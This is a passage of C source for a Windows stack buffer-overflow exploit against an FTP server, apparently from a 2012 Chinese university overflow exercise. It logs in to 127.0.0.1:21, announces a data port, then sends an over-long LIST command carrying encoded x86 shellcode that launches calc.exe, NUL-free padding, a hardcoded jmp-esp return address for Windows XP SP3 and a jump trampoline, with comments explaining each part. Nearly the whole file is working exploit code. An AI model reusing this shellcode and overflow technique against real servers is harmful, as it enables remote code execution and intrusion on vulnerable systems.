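        /* Tell the user that we could not find a usable WinSock DLL. */
        return err;
    }
    /* Confirm that the WinSock DLL supports 2.2. A DLL that also supports
     * newer versions still reports 2.2 here because that is what we asked for. */
    if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) {
        WSACleanup();
        return -1;
    }
    return 0;
}

/*
 * The LIST line, sent with sizeof() (raw bytes, no terminator). The whole
 * buffer is free of 0x00 bytes, which matters because the vulnerable copy on
 * the server side is a strcpy.
 */
BYTE szExp[] = {
    // FTP command "LIST " (the original comment said PORT; the bytes spell LIST)
    0x4c, 0x49, 0x53, 0x54, 0x20,
    // Payload that opens calc.exe. The leading bytes (mov eax,imm32; fld st(6);
    // fnstenv [esp-0xc]; pop edx; sub ecx,ecx; mov cl,0x23; xor [edx+..],eax; ...)
    // look like a Metasploit shikata_ga_nai-encoded x86 payload -- the
    // generator is not recorded, treat the bytes as opaque.
    0xb8, 0x82, 0x0a, 0x8d, 0x38, 0xd9, 0xc6, 0xd9, 0x74, 0x24, 0xf4, 0x5a, 0x29, 0xc9, 0xb1, 0x23, 0x31, 0x42, 0x12, 0x83, 0xea, 0xfc, 0x03, 0xc0, 0x04, 0x6f, 0xcd, 0x38, 0xf0, 0x2b, 0x2e, 0xc0, 0x01, 0x3f, 0x6b, 0xfc, 0x8a, 0x43, 0x71, 0x84, 0x8d, 0x54, 0xf2, 0x3b, 0x96, 0x21, 0x5a, 0xe3, 0xa7, 0xde, 0x2c, 0x68, 0x93, 0xab, 0xae, 0x80, 0xed, 0x6b, 0x29, 0xf0, 0x8a, 0xac, 0x3e, 0x0f, 0x52, 0xe6, 0xb2, 0x0e, 0x96, 0x1c, 0x38, 0x2b, 0x42, 0xc7, 0xc5, 0x3e, 0x8f, 0x8c, 0x99, 0xe4, 0x4e, 0x78, 0x43, 0x6f, 0x5c, 0x35, 0x07, 0x30, 0x41, 0xc8, 0xfc, 0x45, 0x65, 0x41, 0x03, 0xb2, 0x1f, 0x09, 0x20, 0x40, 0xe3, 0x83, 0xe8, 0x2c, 0x68, 0xa3, 0xd8, 0x29, 0xae, 0x5c, 0x15, 0xba, 0x6f, 0x91, 0xae, 0xcc, 0x73, 0x04, 0x3b, 0x44, 0x84, 0xbd, 0x35, 0x1f, 0x14, 0xf1, 0x46, 0x1f, 0x15, 0x79, 0x2e, 0x23, 0x4a, 0x4c, 0x59, 0x3b, 0x22, 0x27, 0x5d, 0x38, 0x0a, 0x4c, 0xce, 0x56, 0xf5, 0x6b, 0x0c, 0xd5, 0x61, 0x14, 0x2f, 0x93, 0x7c, 0x73, 0x2f, 0x44, 0xe3, 0x1a, 0xa3, 0xe9, 0xe4,
    // Everything from here to the return address only needs to be NUL-free
    // padding of the right length. It appears to be the remains of an earlier
    // hand-written attempt ("calc.exe", "open", IAT calls with 0xfe standing in
    // for 0x00) followed by digit runs; presumably never executed because the
    // payload above does not return -- TODO confirm. Copied verbatim.
    0x90, 0x90, 0x34, 0x34, 0x34, 0x34, 0x31,
    0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0xfe, 0x6f, 0x70, 0x65, 0x6e, 0xfe, 0xcc, 0x6a, 0x8b, 0xd8, 0x83, 0xc3, 0x28, 0x53, 0x6a, 0x01, 0x6a, 0xfe, 0x6a, 0xfe, 0x50, 0x83, 0xc0, 0x09, 0x50, 0x6a, 0xfe, 0xff, 0x15, 0xd8, 0x86, 0x45, 0xfe, 0xff, 0x15, 0x2c, 0x86, 0x45, 0xfe, 0xfe, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, 0x35, 0x35, 0x3b, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, 0x35, 0x35, 0x3a, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, 0x35, 0x35, 0x39, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, 0x35, 0x35, 0x38, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, 0x35, 0x35, 0x37, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34,
    0x34, 0x34, 0x35,
    // Saved return address: 0x7ffa4512 = jmp esp, outside every DLL and stable
    // across XP SP3 installs (no ASLR); see the task-3 write-up. Provided by stz.
    0x12, 0x45, 0xfa, 0x7f,
    // the author's own kernel32/ntdll candidate, which failed in the VM:
    // 0x03, 0x37, 0x1a, 0x77,
    // Executed by the jmp esp: push eax / jmp [esp] (50 FF 24 24 -- note
    // FF 24 24 is jmp dword ptr [esp], not jmp esp). eax still points at the
    // start of the received line, so this lands on the payload above.
    0x50, 0xff, 0x24, 0x24,
    // CRLF terminates the command line
    0x0d, 0x0a
};

char szUser[MAXBYTE] = "USER test";
char szPass[MAXBYTE] = "PASS test";
BYTE szPort[MAXBYTE] = "PORT 127,0,0,1,";

/* Banner and credential prompt. The %247s widths leave room in the
 * MAXBYTE (255) buffers for the 5-byte command prefix, "\r\n" and the
 * terminator; the original used an unbounded %s into a 255-byte buffer. */
void IsDisplay()
{
    system("color 0a & title 西电第四题溢出题 EXP.");
    puts("**************************************");
    puts("* By 半斤八兩 *");
    puts("* ftp exp *");
    puts("* date 2012.10.05 *");
    puts("**************************************");
    puts("");
    puts("请FTP输入用户名:");
    (void)scanf("%247s", &szUser[5]);   /* on failure the "test" default stays */
    puts("请FTP输入密码:");
    (void)scanf("%247s", &szPass[5]);
}

/* Read one reply from s into buf (capacity cap) and print it. recv() does
 * not NUL-terminate, and the original reused a buffer that could end up
 * unterminated or carry a stale tail; the terminator is written here.
 * Returns recv()'s result (<= 0 on EOF/error, buf is then ""). */
static int ReadReply(SOCKET s, char *buf, int cap)
{
    int n = recv(s, buf, cap - 1, 0);
    buf[n > 0 ? n : 0] = '\0';
    puts(buf);
    return n;
}

int main(int argc, char* argv[])
{
    char szBuf[MAXBYTE] = {0};
    int nLen;

    if (IsInit() != 0) {
        puts("WSAStartup failed");
        return 1;
    }
    IsDisplay();

    /* Finish the two credential lines; the buffers are sized for this (see IsDisplay). */
    nLen = strlen(szUser);
    strcpy(szUser + nLen, "\r\n");
    nLen = strlen(szPass);
    strcpy(szPass + nLen, "\r\n");

    SOCKET sFtp = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sFtp == INVALID_SOCKET) {
        puts("socket() failed");
        WSACleanup();
        return 1;
    }
    SOCKADDR_IN tagSockAddr = {0};
    tagSockAddr.sin_family = AF_INET;
    tagSockAddr.sin_port = htons(21);
    tagSockAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    if (connect(sFtp, (sockaddr*)&tagSockAddr, sizeof(tagSockAddr)) == SOCKET_ERROR) {
        puts("connect() to 127.0.0.1:21 failed");
        closesocket(sFtp);
        WSACleanup();
        return 1;
    }

    // welcome banner
    ReadReply(sFtp, szBuf, sizeof(szBuf));

    // USER
    send(sFtp, szUser, strlen(szUser), 0);
    ReadReply(sFtp, szBuf, sizeof(szBuf));
    Sleep(500);   // the server mishandles back-to-back commands; see the write-up

    // PASS
    send(sFtp, szPass, strlen(szPass), 0);
    ReadReply(sFtp, szBuf, sizeof(szBuf));
    Sleep(500);

    // Data-connection listener on an ephemeral port, announced with
    // PORT h1,h2,h3,h4,p1,p2 (RFC 959: port = p1 * 256 + p2).
    SOCKET sDir = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    SOCKADDR_IN tagDirAddress = {0};
    tagDirAddress.sin_family = AF_INET;
    tagDirAddress.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    bind(sDir, (sockaddr*)&tagDirAddress, sizeof(tagDirAddress));
    nLen = sizeof(tagDirAddress);
    getsockname(sDir, (sockaddr*)&tagDirAddress, &nLen);   // learn the port the OS picked
    listen(sDir, 1);
    /* sin_port is in network byte order. The original computed
     * (sin_port - 10) / 256 and always sent p2 = 10, i.e. announced a port
     * unrelated to the listener; ntohs() gives the real one. */
    u_short usDataPort = ntohs(tagDirAddress.sin_port);
    nLen = strlen((PCHAR)szPort);
    /* at most "255,255\r\n" (9 chars) is appended to the 15-char prefix */
    sprintf((PCHAR)szPort + nLen, "%d,%d\r\n", usDataPort / 256, usDataPort % 256);
    Sleep(500);

    // PORT
    send(sFtp, (PCHAR)szPort, strlen((PCHAR)szPort), 0);
    ReadReply(sFtp, szBuf, sizeof(szBuf));
    Sleep(500);

    // The over-long LIST line; sizeof() because the array is not a C string.
    send(sFtp, (PCHAR)szExp, sizeof(szExp), 0);
    /* No reply is waited for: if the overflow worked the server is running
     * the payload. (The original called recv() on the *listening* socket
     * here, which fails immediately because it was never accept()ed.) */
    Sleep(500);
    closesocket(sDir);
    closesocket(sFtp);
    WSACleanup();
    return 0;
}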